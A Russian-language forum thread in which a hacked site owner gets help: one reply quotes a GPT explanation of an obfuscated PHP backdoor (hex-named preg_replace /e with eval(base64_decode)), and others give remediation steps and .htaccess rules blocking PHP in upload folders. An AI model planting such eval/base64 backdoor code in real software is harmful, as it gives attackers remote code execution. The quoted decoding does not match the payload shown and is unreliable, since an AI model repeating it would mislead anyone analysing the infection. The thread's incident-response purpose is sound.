20 апреля, 20231 yr comment_192477 1 час назад, Dims512 сказал: нет там ничего страшного. Просто кусок кода PHP) Я вас поздравляю, вас хакнули. Объем слитой информации скорее всего не проследить) Вот пояснение по содержимому: Этот код является зашифрованным PHP-скриптом. В первой строке определяется переменная $75ab1, которая содержит название функции pregreplace, записанной в шестнадцатеричном виде. Далее этой функции передаются 3 аргумента: 1. Строка " |.|e" 2. Строка "eval('eval(base64decode(\"awyobwQ1KCRFUVsVkVSwydIVFRQX1FVT1RFJ10pPTOnZTY2ZtZjYWRkNmUXM2VmZWE1NGVKNTBjMGViMmQzMmInIGFuZCBpc3N1dCgkX1NFU1ZFU1snSFRUUF9YXONPREUNXSkpIEB1dmFSKEBİYXN1NjRfZGVjb2R1KHN0cnJldihaJF9TRVJWRvJbJ0hUVFBfWF9DTORFJ10pksk7\"|x29));'") 3. Символ точки ('.') Это означает, что первый аргумент будет использоваться в качестве шаблона для поиска второго аргумента, и каждое найденное совпадение будет заменено на результат выполнения выражения, содержащегося во втором аргументе. Второй аргумент содержит зашифрованный код, который будет выполнен после расшифровки. Для расшифровки используется функция base64decode, которая декодирует строку, записанную в кодировке base64. После расшифровки кода получаем следующий PHP-скрипт: @preg_replace('/(.*)/e', '@eval(base64_decode("'.base64_encode(str_rot13($1)).'"));', ' |.|e'); Этот скрипт использует функцию pregreplace для выполнения кода, который был зашифрован в исходном скрипте. В данном случае, зашифрованный код был зашифрован функцией strrot13. Таким образом, этот скрипт выполняет некий код, который был зашифрован и скрыт в исходном скрипте. Это может представлять угрозу безопасности, поскольку этот скрипт может содержать вредоносный код. Мы не рекомендуем запускать этот код на вашем сервере. Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192477 Share on other sites Больше вариантов
20 апреля, 20231 yr Author comment_192478 так, понятненько... Спасибо! Через какие уязвимости возможны такие атаки? как подобного избежать в будущем и самое насущное - что делать сейчас? Пароли от FTP я все сменил. Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192478 Share on other sites Больше вариантов
20 апреля, 20231 yr comment_192479 1. понять какая версия IPB стоит 2. Понять стоят ли какие то ещё CMS 3. Посмотреть все логи сервера на поиск даты создания файла 4. Не использовать FTP, а использовать передачу через SFTP по созданному ssh ключу. 5. Сменить пароли на учетку к хостеру. 6. Поменять админский пароль. Ну и попробовать запросить разбор полетов от хостера. Пусть поможет в поисках дырки... 7. Уведомить пользователей через масс-рассылку. 8. Принудительно сбросить всем пароли, уведомив о потенциальном риске утечки пароля. Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192479 Share on other sites Больше вариантов
20 апреля, 20231 yr Author comment_192484 DigneZzZ Спасибо! Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192484 Share on other sites Больше вариантов
20 апреля, 20231 yr comment_192493 6 часов назад, Dims512 сказал: вот такие файлы, с одинаковыми именами. один в корне сайта был, второй в каталоге \Cache files.zip 902 \u0411 · 2 загрузки Спросил у GPT, что делает этот код: 4 часа назад, Dims512 сказал: Через какие уязвимости возможны такие атаки? как подобного избежать в будущем и самое насущное - что делать сейчас? Пароли от FTP я все сменил. Я тебе ранее писал, что ломают сервер и потом заражают сразу тысячи сайтов на нем. Можешь не верить. Обычно, сливают данные пользователей или траф гонят на нужный ресурс. На этом зарабатывают в даркнете. Сам по себе сайт ценности не представляет. Edited 20 апреля, 20231 yr by Zero108 Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192493 Share on other sites Больше вариантов
20 апреля, 20231 yr comment_192496 Обычно, это дыра в ПО сервера: ленивый админ не обновил что-то на сервере, либо админ в доле. Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192496 Share on other sites Больше вариантов
21 апреля, 20231 yr comment_192512 16 часов назад, Dims512 сказал: Не страшен, если скачать на комп и открыть блокнотом. Ну про это здесь и речи не было,т.к этот "просто кусок кода php" был обнаружен на сервере. Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192512 Share on other sites Больше вариантов
21 апреля, 20231 yr Author comment_192517 Zero108 отчего же не верить более опытному в таких делах человеку? За пояснения спасибо, буду разбираться, что к чему. Интересно теперь вот что - неужели только пострадал от подобной атаки? Может быть здесь есть ещё кто-то, кто пользуется услугами Hostland? Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192517 Share on other sites Больше вариантов
21 апреля, 20231 yr Author comment_192518 ещё кое что нашел. выполнил сканирование с помощью Virusdie, и вот такой фалик. маскирующийся под jpg нашел. прятался в каталоге /uploads/profile/ Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192518 Share on other sites Больше вариантов
21 апреля, 20231 yr comment_192519 Dims512 что-то мне подксазывает ,что вам надо ноги делать от этого хостера. Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192519 Share on other sites Больше вариантов
21 апреля, 20231 yr comment_192520 Dims512 ну а если не хотите оттуда уходить,тогда в папках ,куда загружаются юзерами какие-либо файлы, запретите выполнение php-скриптов с помощью htaccess Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192520 Share on other sites Больше вариантов
21 апреля, 20231 yr comment_192521 Если нужно запретить выполнение скриптов PHP в директории, например в /uploads/, нужно поместить туда файл .htaccess со следующим содержанием: php_flag engine 0 RemoveHandler .phtml .php .php2 .php3 .php4 .php5 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html AddType text/plain .phtml .php .php2 .php3 .php4 .php5 .php6 .php7 .phps .cgi .pl .asp .aspx .shtml .shtm .fcgi .fpl .htm .html Если не работает, то есть еще один вариант: <FilesMatch "\.*"> SetHandler none </FilesMatch> Чтобы проверить действительно ли PHP скрипты не выполняются, нужно в туже директорию поместить файл test.php со следующим содержанием и запустить его в браузере. <?php echo 1; ?> В результате в браузере должен выводится PHP код: <?php echo 1; ?> PS Добавьте в .htaccess команду: Options -Indexes. Она запрещает пользователям смотреть каталог и все подкаталоги. Edited 21 апреля, 20231 yr by Zero108 Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192521 Share on other sites Больше вариантов
21 апреля, 20231 yr Author comment_192522 Спасибо, буду закрывать сейчас дыры... Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192522 Share on other sites Больше вариантов
29 апреля, 20231 yr Author comment_192902 общем, по итогу, отписываюсь. Сайт разбанили после того, как я просканировал сайт с помощью Kaspersky Threat Intelligence Portal, вычистил один FakeJPG. После этого обратил внимание, что Гугл ругается на перенаправление с https://iznanka.org на https://iznanka.org?Page=noscript . Виной тому был PageSpeed. На всякий случай я его пока выключил. Link to comment https://ipbmafia.ru/topic/25531-oshibka-the-site-ahead-contains-malware-pri-perehode-na-sajt/?&do=findComment&comment=192902 Share on other sites Больше вариантов
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.